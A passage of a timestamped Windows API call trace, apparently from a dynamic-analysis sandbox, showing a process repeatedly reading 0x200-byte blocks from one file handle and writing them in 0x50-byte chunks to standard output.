(_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.939] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.940] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.941] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.942] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.943] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.943] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.944] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.944] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.946] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.947] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.947] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, 